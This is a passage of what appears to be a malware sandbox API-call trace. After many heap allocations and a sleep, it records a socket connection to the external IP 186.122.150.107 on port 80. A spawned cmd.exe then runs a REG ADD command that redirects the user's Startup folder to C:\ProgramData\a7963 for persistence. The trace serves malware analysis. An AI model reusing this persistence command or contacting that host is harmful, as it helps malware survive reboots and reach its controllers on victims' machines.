0x2955e10 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2956bd8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x29534b8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x29536b0 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x29538a8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2953aa0 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x29573b8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x295aec8 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x295a8e0 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x295a100 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2959b18 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2959920 [0281.956] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cdea8 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29d0898 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cf1b8 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29d1220 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29ce460 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cefd0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cf770 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cfd28 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cdad8 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cf3a0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29d0e50 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cec00 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cdcc0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29ce648 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29cf588 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x29ce090 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2922e90 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x29244b0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2923b78 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x29242d8 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2920f38 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x29239a0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2923418 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2921fd0 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2923d50 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2923f28 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2921c20 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2920d60 [0281.958] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2922cb8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2921870 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2923240 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x2920b88 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289e318 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289e870 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289ea38 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289ec00 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289edc8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289ef90 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289f158 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289ca28 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289f4e8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289f878 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x289fc08 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a3178 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a2fb0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a36d0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a2170 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x28a06b8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292eb80 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292f418 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292ce48 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292ddc0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292d6e0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292df78 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292eef0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292f940 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292e2e8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292e4a0 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292f0a8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292f260 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x292faf8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2930020 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x29301d8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x2931f10 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b65d8 [0281.959] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b6430 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b6c78 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b5f38 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b4d00 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b49b0 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b6e20 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b51f8 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b5be8 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b4168 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b6ad0 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b6fc8 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b7170 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b7318 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b5d90 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x29b4310 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2977670 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2977b38 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978e58 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978198 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978000 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978660 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x29787f8 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978990 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978b28 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2978ff0 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x297c620 [0281.960] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x297c7b8 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x297c488 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2979e48 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x2979980 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x297aca0 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293cfc0 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293e530 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293e9c8 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x293ccb0 [0281.961] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dedc8 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dd858 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dd6d0 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dc5f8 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dc2e8 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dc780 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29def50 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dcc18 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29de7a8 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29de930 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dc470 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x29dd9e0 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960000 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960178 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960468 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960a48 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960bc0 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2960d38 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2964508 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2962d88 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2964218 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2963078 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29631f0 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2963368 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2964970 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x29634e0 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2962920 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x2963658 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x299f340 [0281.962] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x299fe80 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a0588 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a06f0 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a1500 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a17d0 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x299fd18 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a09c0 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a1938 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a0150 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a02b8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a28b0 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a3c60 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a2a18 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a1d70 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x29a3dc8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f30b8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3a20 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3210 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3cd0 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3e28 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3368 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3770 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f38c8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f48e8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f4a40 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f3f80 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x28f40d8 [0281.963] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x29e6cf8 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x29e77b8 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x29e6390 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x29e7e70 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bc5f0 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bc738 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bac50 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bb170 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bb400 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29ba5e8 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bbcf8 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bc880 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bb548 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bad98 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bc218 [0281.964] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bb690 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bb7d8 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29ba210 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bbbb0 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x29bbe40 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2942440 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x29427e8 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2942920 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2942a58 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2942cc8 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x29431a8 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2945158 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x29442b8 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2946130 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2945020 [0281.965] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x2945c50 [0281.973] Sleep (dwMilliseconds=0xea60) [0291.985] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0291.985] socket (af=2, type=1, protocol=6) returned 0x2bc [0291.988] htons (hostshort=0x50) returned 0x5000 [0291.988] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0291.988] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0291.989] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0291.989] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0291.989] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0291.989] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) Thread: id = 66 os_tid = 0xdcc Thread: id = 76 os_tid = 0x13a0 Thread: id = 77 os_tid = 0xdfc Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x53ce7000" os_pid = "0x308" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x4a8" cmd_line = "cmd.exe /c REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0xe34 [0121.641] GetModuleHandleA (lpModuleName=0x0) returned 0x960000 [0121.641] __set_app_type (_Type=0x1) [0121.641] __p__fmode () returned 0x75873c14 [0121.641] __p__commode () returned 0x758749ec [0121.641] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x976fd0) returned 0x0 [0121.641] __getmainargs (in: _Argc=0x98d1a4, _Argv=0x98d1a8, _Env=0x98d1ac, _DoWildCard=0, _StartInfo=0x98d1b8 | out: _Argc=0x98d1a4, _Argv=0x98d1a8, _Env=0x98d1ac) returned 0 [0121.641] _onexit (_Func=0x978030) returned 0x978030 [0121.641] _onexit (_Func=0x978040) returned 0x978040 [0121.641] _onexit (_Func=0x978050) returned 0x978050 [0121.642] _onexit (_Func=0x978060) returned 0x978060 [0121.642] _onexit (_Func=0x978070) returned 0x978070 [0121.643] _onexit (_Func=0x978080) returned 0x978080 [0121.643] GetCurrentThreadId () returned 0xe34 [0121.643] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe34) returned 0xbc [0121.644] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75b20000 [0121.644] GetProcAddress (hModule=0x75b20000, lpProcName="SetThreadUILanguage") returned 0x75b34f70 [0121.644] SetThreadUILanguage (LangId=0x0) returned 0x2f60409 [0121.652] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0121.652] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30ffb18 | out: phkResult=0x30ffb18*=0x0) returned 0x2 [0121.652] VirtualQuery (in: lpAddress=0x30ffb23, lpBuffer=0x30ffad0, dwLength=0x1c | out: lpBuffer=0x30ffad0*(BaseAddress=0x30ff000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.652] VirtualQuery (in: lpAddress=0x3000000, lpBuffer=0x30ffad0, dwLength=0x1c | out: lpBuffer=0x30ffad0*(BaseAddress=0x3000000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0121.653] VirtualQuery (in: lpAddress=0x3001000, lpBuffer=0x30ffad0, dwLength=0x1c | out: lpBuffer=0x30ffad0*(BaseAddress=0x3001000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0121.653] VirtualQuery (in: lpAddress=0x3003000, lpBuffer=0x30ffad0, dwLength=0x1c | out: lpBuffer=0x30ffad0*(BaseAddress=0x3003000, AllocationBase=0x3000000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0121.653] VirtualQuery (in: lpAddress=0x3100000, lpBuffer=0x30ffad0, dwLength=0x1c | out: lpBuffer=0x30ffad0*(BaseAddress=0x3100000, AllocationBase=0x3100000, AllocationProtect=0x4, RegionSize=0x35000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0121.653] GetConsoleOutputCP () returned 0x1b5 [0121.655] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x993850 | out: lpCPInfo=0x993850) returned 1 [0121.655] SetConsoleCtrlHandler (HandlerRoutine=0x987260, Add=1) returned 1 [0121.655] _get_osfhandle (_FileHandle=1) returned 0x90 [0121.655] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x99388c | out: lpMode=0x99388c) returned 1 [0121.655] _get_osfhandle (_FileHandle=0) returned 0x8c [0121.655] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x993888 | out: lpMode=0x993888) returned 1 [0121.656] _get_osfhandle (_FileHandle=1) returned 0x90 [0121.656] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0121.656] _get_osfhandle (_FileHandle=1) returned 0x90 [0121.656] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x993890 | out: lpMode=0x993890) returned 1 [0121.656] _get_osfhandle (_FileHandle=1) returned 0x90 [0121.656] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0121.656] _get_osfhandle (_FileHandle=0) returned 0x8c [0121.656] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x993894 | out: lpMode=0x993894) returned 1 [0121.657] _get_osfhandle (_FileHandle=0) returned 0x8c [0121.657] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0121.657] GetEnvironmentStringsW () returned 0x3364fc0* [0121.657] GetProcessHeap () returned 0x3360000 [0121.657] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc12) returned 0x3365be0 [0121.657] FreeEnvironmentStringsA (penv="=") returned 1 [0121.657] GetProcessHeap () returned 0x3360000 [0121.657] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x4) returned 0x3363cb8 [0121.657] GetEnvironmentStringsW () returned 0x3364fc0* [0121.657] GetProcessHeap () returned 0x3360000 [0121.657] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc12) returned 0x3366800 [0121.657] FreeEnvironmentStringsA 